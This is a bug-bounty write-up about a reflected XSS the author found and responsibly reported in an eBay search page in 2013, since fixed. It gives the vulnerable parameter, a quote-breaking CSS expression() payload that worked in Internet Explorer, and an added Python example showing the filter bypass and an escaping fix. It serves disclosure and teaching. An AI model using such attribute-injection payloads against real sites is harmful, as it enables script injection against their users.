Reflected XSS in Ebay.com

Sukhmeet Singh
3 min read, Jul 22, 2019


In Sept. 2013 I found a Reflected XSS in www.ebay.com. Why write it up now? Because I didn’t want to “show off”, for reasons. Enough with the drama :D. Let’s get to the point.

So I was looking at all the names in the Hall of Fame of different sites. On eBay’s Security Researcher page, I thought the list was long, but I wanted my name on it.

So I started playing with all the GET parameters and came across this possibly vulnerable page.

URL: http://www.ebay.in/sch/Coins-Notes-/11116/i.html

Vulnerable parameter: LH_SpecificSeller

Reflected code (the parameter value is echoed twice, shown as XSS HERE: once inside the title attribute and once as the text of the inner span):

<span style="display:none">
<span title='XSS HERE'> XSS HERE </span>
</span>

List of hurdles:

  1. The characters < > and , are removed from the reflected value, so no new tag can be injected; the only option left is attribute injection inside the existing span.
  2. The affected span sits inside a parent span with display: none, so it is never rendered and never receives mouse events.

Because the parent span had the CSS style display: none, it was not possible to trigger an event. Neither was it possible to make the affected span visible, for the same reason, though I tried by adding a style attribute. I tried all the other payloads, be it onload / onerror events or a data: URI in the style attribute. But after a little research; OK OK, after 8 hours of research, I came upon a CSS expression payload.

http://www.ebay.in/sch/Coins-Notes-/11116/i.html?LH_SpecificSeller=1..xss'+style="xss:expression(prompt(1))"+id='1

Aaand it worked! Not in Firefox and Google Chrome, but in Internet Explorer. Yes, I had to use Internet Explorer, out of compulsion. But that was enough for me.
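To make the mechanics of that payload concrete, here is an added Python example; it is not part of the original write-up and not eBay’s code. It uses a constructed stand-in for the server-side filter (stripping < > and , exactly as the hurdles list says, quotes untouched), the reflected markup quoted above, and Python’s own HTML parser in place of the browser’s tokenizer. The function names, the weak_filter / hardened_filter pair and the sample tag payload are assumptions for illustration. It shows why a tag payload gets flattened, how the quote-plus-space trick lands a style attribute on the inner span even though the value never leaves the span, and that escaping the quotes closes the hole. The expression() call itself only ever ran in old Internet Explorer, so nothing here executes it; the example stops at the parsed attribute list.

```python
from html.parser import HTMLParser
from urllib.parse import unquote_plus
import html


# Constructed stand-in for the server-side filter the write-up describes:
# "<", ">" and "," are stripped, but quotes are left alone. This is an
# assumption about the original code, not the real implementation.
def weak_filter(value: str) -> str:
    return value.replace("<", "").replace(">", "").replace(",", "")


def hardened_filter(value: str) -> str:
    # Same stripping plus real attribute escaping (quotes included). Escaping
    # the single quote is what stops the value from breaking out of title='...'.
    return html.escape(weak_filter(value), quote=True)


def render(value: str, sanitizer) -> str:
    # Mirrors the reflected markup quoted in the write-up: the value lands in
    # the title attribute and in the text of the inner, hidden span.
    v = sanitizer(value)
    return f"<span style=\"display:none\"><span title='{v}'> {v} </span></span>"


class TagCollector(HTMLParser):
    """Record every start tag with its attributes, roughly as a browser tokenizer would."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse(markup: str):
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def tags_seen(markup: str):
    # Hurdle 1: with "<" and ">" gone, an <img onerror=...> payload never
    # becomes an element; only the two original spans exist.
    return [t for t, _ in parse(markup)]


def inner_span_attrs(markup: str) -> dict:
    # Index 0 is the display:none parent, index 1 is the span we control.
    return parse(markup)[1][1]


# The exact query-string value from the write-up. "+" decodes to a space,
# which is what separates the injected attributes from the original title=;
# the leading quote closes title='...', the trailing id='1 re-balances the
# quote the template appends after the value.
PAYLOAD = "1..xss'+style=\"xss:expression(prompt(1))\"+id='1"


def decoded_payload() -> str:
    return unquote_plus(PAYLOAD)


if __name__ == "__main__":
    print(render(decoded_payload(), weak_filter))
    print(inner_span_attrs(render(decoded_payload(), weak_filter)))
    print(tags_seen(render("<img src=x onerror=alert(1)>", weak_filter)))
    print(inner_span_attrs(render(decoded_payload(), hardened_filter)))
```

With weak_filter the inner span parses with three attributes, title, style and id, and the style value is the expression() string, which is why a hidden, event-less element was still enough in IE: a style attribute is evaluated without the element being visible or interacted with. With hardened_filter the whole payload stays inside the title value and no style attribute exists.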

So I reported it, and after a month they fixed it and I got a reply from them.

And that’s how I got my name on the list. Here it is.
